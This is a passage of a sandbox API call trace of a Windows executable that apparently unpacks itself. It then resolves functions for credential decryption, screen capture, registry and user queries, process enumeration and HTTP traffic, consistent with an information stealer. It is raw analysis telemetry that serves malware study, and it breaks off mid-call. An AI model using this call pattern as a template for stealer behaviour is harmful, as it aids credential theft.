GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.729] GetLastError () returned 0x0 [0112.730] GetLastError () returned 0x0 [0112.730] GetLastError () returned 0x0 [0112.730] GetLastError () returned 0x0 [0112.730] GetLastError () returned 0x0 [0112.730] GetLastError () returned 0x0 [0112.730] GetLastError () returned 0x0 [0112.730] GetLastError () returned 0x0 [0112.730] GetLastError () returned 0x0 [0112.730] GetLastError () returned 0x0 [0112.730] GetLastError () returned 0x0 [0112.730] GetLastError () returned 0x0 [0112.730] GetLastError () returned 0x0 [0112.730] GetLastError () returned 0x0 [0112.730] GetLastError () returned 0x0 [0112.730] GetLastError () returned 0x0 [0112.730] GetLastError () returned 0x0 [0113.673] lstrcatA (in: lpString1="", lpString2="kernel32.dll" | out: lpString1="kernel32.dll") returned="kernel32.dll" [0113.673] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0113.674] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0113.674] LocalAlloc (uFlags=0x0, uBytes=0x55670) returned 0x2b0a80 [0113.691] VirtualProtect (in: lpAddress=0x2b0a80, dwSize=0x55670, flNewProtect=0x40, lpflOldProtect=0x18fbbc | out: lpflOldProtect=0x18fbbc*=0x4) returned 1 [0113.708] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0113.708] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0113.708] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0113.708] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0113.708] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0113.708] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0113.708] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0113.708] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0113.708] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x44 [0113.710] Module32First (hSnapshot=0x44, lpme=0x18fbbc) returned 1 [0113.711] VirtualAlloc (lpAddress=0x0, dwSize=0x88450, flAllocationType=0x1000, flProtect=0x40) returned 0x2e70000 [0113.765] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0113.765] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0113.765] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0113.765] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0113.765] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0113.765] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0113.765] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0113.766] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0113.766] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0113.766] SetErrorMode (uMode=0x400) returned 0x0 [0113.766] SetErrorMode (uMode=0x0) returned 0x400 [0113.766] GetVersionExA (in: lpVersionInformation=0x18eaec*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18eaec*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0113.766] VirtualAlloc (lpAddress=0x0, dwSize=0x87600, flAllocationType=0x1000, flProtect=0x4) returned 0x2f00000 [0113.775] VirtualProtect (in: lpAddress=0x400000, dwSize=0x8d000, flNewProtect=0x40, lpflOldProtect=0x18fb74 | out: lpflOldProtect=0x18fb74*=0x2) returned 1 [0114.194] VirtualFree (lpAddress=0x2f00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0114.197] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0114.197] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0114.197] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0114.197] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0114.197] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0114.197] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0114.197] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0114.197] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0114.197] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0114.197] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0114.198] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0114.198] GetProcAddress (hModule=0x76d30000, lpProcName="Process32Next") returned 0x76d688a4 [0114.198] GetProcAddress (hModule=0x76d30000, lpProcName="Process32First") returned 0x76d68ae7 [0114.198] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0114.198] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0114.198] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0114.198] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0114.198] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0114.198] GetProcAddress (hModule=0x76d30000, lpProcName="FileTimeToSystemTime") returned 0x76d4542c [0114.198] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0114.198] GetProcAddress (hModule=0x76d30000, lpProcName="GetPrivateProfileSectionNamesA") returned 0x76dba1c9 [0114.198] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0114.198] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesW") returned 0x76d41b18 [0114.198] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0114.198] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedCompareExchange") returned 0x76d41484 [0114.198] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0114.199] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0114.199] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0114.199] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0114.199] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0114.199] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0114.199] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0114.199] GetProcAddress (hModule=0x76d30000, lpProcName="UnlockFile") returned 0x76d6cf36 [0114.199] GetProcAddress (hModule=0x76d30000, lpProcName="LockFile") returned 0x76d6cf1e [0114.199] GetProcAddress (hModule=0x76d30000, lpProcName="LockFileEx") returned 0x76d6d57c [0114.199] GetProcAddress (hModule=0x76d30000, lpProcName="UnlockFileEx") returned 0x76d6d594 [0114.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesA") returned 0x76d45414 [0114.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesExW") returned 0x76d44574 [0114.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0114.199] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0114.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0114.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTime") returned 0x76d45a96 [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathA") returned 0x76d6276c [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathW") returned 0x76d5d4dc [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageA") returned 0x76d65fbd [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameA") returned 0x76d4e2c1 [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameW") returned 0x76d440d4 [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceA") returned 0x76dc433f [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceW") returned 0x76d5f7aa [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemInfo") returned 0x76d449ca [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingA") returned 0x76d45506 [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameA") returned 0x76d5b6e0 [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0114.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0114.201] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0114.201] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0114.201] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0114.201] GetProcAddress (hModule=0x76d30000, lpProcName="TzSpecificLocalTimeToSystemTime") returned 0x76d6066a [0114.201] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0114.201] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoA") returned 0x76d5d5e5 [0114.201] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandle") returned 0x76d453ae [0114.201] GetProcAddress (hModule=0x76d30000, lpProcName="SystemTimeToFileTime") returned 0x76d45a7e [0114.201] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocalTime") returned 0x76d45aa6 [0114.201] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0114.201] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0114.201] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0114.201] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesA") returned 0x76d6287b [0114.201] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0114.201] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0114.201] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0114.202] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0114.202] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0114.202] GetProcAddress (hModule=0x76d30000, lpProcName="SetCurrentDirectoryA") returned 0x76d51834 [0114.202] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0114.202] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0114.202] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0114.202] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0114.202] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0114.202] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDriveStringsA") returned 0x76d4e4dc [0114.202] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0114.202] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0114.202] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0114.202] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0114.202] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0114.202] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0114.202] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0114.203] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0114.203] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0114.203] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0114.203] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0114.203] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0114.203] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0114.203] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0114.203] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0114.203] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableW") returned 0x76d489f1 [0114.203] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0114.203] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0114.203] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0114.203] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0114.203] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0114.203] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0114.204] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0114.204] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0114.204] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0114.204] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0114.204] GetProcAddress (hModule=0x76d30000, lpProcName="SetHandleCount") returned 0x76d4cb29 [0114.204] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0114.204] GetProcAddress (hModule=0x76d30000, lpProcName="HeapCreate") returned 0x76d44a2d [0114.204] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0114.204] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0114.204] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0114.204] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0114.204] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0114.204] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0114.204] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0114.204] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0114.204] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0114.205] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0114.205] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0114.205] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0114.205] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0114.205] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0114.205] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0114.205] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0114.205] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0114.205] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0114.205] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0114.205] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0114.205] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0114.205] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0114.206] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0114.206] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedExchange") returned 0x76d41462 [0114.206] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0114.206] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0114.206] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0114.206] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0114.340] GetProcAddress (hModule=0x77130000, lpProcName="GetSystemMetrics") returned 0x77147d2f [0114.340] GetProcAddress (hModule=0x77130000, lpProcName="wsprintfA") returned 0x7715ae5f [0114.340] GetProcAddress (hModule=0x77130000, lpProcName="CharToOemA") returned 0x77154fee [0114.341] GetProcAddress (hModule=0x77130000, lpProcName="EnumDisplayDevicesW") returned 0x7716e567 [0114.341] GetProcAddress (hModule=0x77130000, lpProcName="GetDC") returned 0x771472c4 [0114.341] GetProcAddress (hModule=0x77130000, lpProcName="ReleaseDC") returned 0x77147446 [0114.341] GetProcAddress (hModule=0x77130000, lpProcName="GetKeyboardLayoutList") returned 0x77152e69 [0114.341] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0114.341] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0114.341] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0114.341] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0114.341] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0114.341] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0114.342] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0114.342] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0114.342] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0114.342] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0114.342] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0114.342] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExA") returned 0x77724907 [0114.342] GetProcAddress (hModule=0x77710000, lpProcName="RegEnumKeyExA") returned 0x77721481 [0114.342] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameA") returned 0x7773a4b4 [0114.342] GetProcAddress (hModule=0x77710000, lpProcName="GetCurrentHwProfileA") returned 0x777511f8 [0114.342] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0114.342] GetProcAddress (hModule=0x77710000, lpProcName="RegGetValueW") returned 0x77720e47 [0114.343] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0114.343] GetProcAddress (hModule=0x77710000, lpProcName="RegGetValueA") returned 0x7771a9dd [0114.343] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0114.368] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0114.369] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0114.369] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0114.372] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0114.372] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0114.372] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0114.372] GetProcAddress (hModule=0x772f0000, lpProcName="PathMatchSpecW") returned 0x773086f7 [0114.372] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0114.376] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0114.376] GetProcAddress (hModule=0x77550000, lpProcName="CryptUnprotectData") returned 0x77585a7f [0114.376] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x77060000 [0114.377] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleFileNameExA") returned 0x770615bc [0114.378] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0114.378] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameA") returned 0x770615a4 [0114.378] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0114.384] GetProcAddress (hModule=0x758d0000, lpProcName="InternetConnectA") returned 0x758f49e9 [0114.385] GetProcAddress (hModule=0x758d0000, lpProcName="HttpOpenRequestA") returned 0x758f4c7d [0114.385] GetProcAddress (hModule=0x758d0000, lpProcName="HttpSendRequestA") returned 0x759618f8 [0114.385] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0114.385] GetProcAddress (hModule=0x758d0000, lpProcName="InternetSetFilePointer") returned 0x7594af16 [0114.385] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0114.385] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoA") returned 0x758ea33e [0114.385] GetProcAddress (hModule=0x758d0000, lpProcName="HttpAddRequestHeadersA") returned 0x758edcd2 [0114.385] GetProcAddress (hModule=0x758d0000, lpProcName="InternetSetOptionA") returned 0x758e75e8 [0114.386] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0114.386] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0114.420] LoadLibraryA (lpLibFileName="gdiplus.dll") returned 0x74910000 [0116.110] GetProcAddress (hModule=0x74910000, lpProcName="GdipCreateBitmapFromHBITMAP") returned 0x74946671 [0116.110] GetProcAddress (hModule=0x74910000, lpProcName="GdipSaveImageToFile") returned 0x749441fd [0116.110] GetProcAddress (hModule=0x74910000, lpProcName="GdipGetImageEncoders") returned 0x7495228c [0116.110] GetProcAddress (hModule=0x74910000, lpProcName="GdiplusShutdown") returned 0x749356be [0116.110] GetProcAddress (hModule=0x74910000, lpProcName="GdiplusStartup") returned 0x74935600 [0116.111] GetProcAddress (hModule=0x74910000, lpProcName="GdipCloneImage") returned 0x74944bfa [0116.111] GetProcAddress (hModule=0x74910000, lpProcName="GdipDisposeImage") returned 0x74944cc8 [0116.111] GetProcAddress (hModule=0x74910000, lpProcName="GdipAlloc") returned 0x74952437 [0116.111] GetProcAddress (hModule=0x74910000, lpProcName="GdipGetImageEncodersSize") returned 0x74952203 [0116.111] GetProcAddress (hModule=0x74910000, lpProcName="GdipFree") returned 0x749524b2 [0116.111] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x74e20000 [0116.114] GetProcAddress (hModule=0x74e20000, lpProcName="BCryptDecrypt") returned 0x74e218b8 [0116.114] GetProcAddress (hModule=0x74e20000, lpProcName="BCryptCloseAlgorithmProvider") returned 0x74e2234e [0116.114] GetProcAddress (hModule=0x74e20000, lpProcName="BCryptDestroyKey") returned 0x74e21f40 [0116.114] GetProcAddress (hModule=0x74e20000, lpProcName="BCryptGenerateSymmetricKey") returned 0x74e21fbc [0116.114] GetProcAddress (hModule=0x74e20000, lpProcName="BCryptSetProperty") returned 0x74e220d4 [0116.114] GetProcAddress (hModule=0x74e20000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x74e22d30 [0116.114] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0116.120] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0116.120] atexit (param_1=0x2e70920) returned 0 [0116.120] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fb88 | out: lpSystemTimeAsFileTime=0x18fb88*(dwLowDateTime=0x2095cd40, dwHighDateTime=0x1d5fd35)) [0116.120] GetCurrentProcessId () returned 0xa40 [0116.120] GetCurrentThreadId () returned 0x644 [0116.120] GetTickCount () returned 0x114de2f [0116.120] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb80 | out: lpPerformanceCount=0x18fb80*=23634356987) returned 1 [0116.120] GetStartupInfoW (in: lpStartupInfo=0x18fb2c | out: lpStartupInfo=0x18fb2c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18fb90, hStdError=0x466795)) [0116.120] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.120] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2f80000 [0116.121] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0116.121] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0116.121] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0116.121] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0116.121] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0116.122] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x214) returned 0x2f807d0 [0116.123] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0116.123] GetCurrentThreadId () returned 0x644 [0116.123] GetStartupInfoW (in: lpStartupInfo=0x18fac8 | out: lpStartupInfo=0x18fac8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x45df40, hStdOutput=0x45e279, hStdError=0x2f807d0)) [0116.123] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x8, Size=0x800) returned 0x2f809f0 [0116.123] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0116.123] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0116.123] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0116.123] SetHandleCount (uNumber=0x20) returned 0x20 [0116.123] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\5.exe\" " [0116.123] GetEnvironmentStringsW () returned 0x314b30* [0116.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0116.124] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x565) returned 0x2f811f8 [0116.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 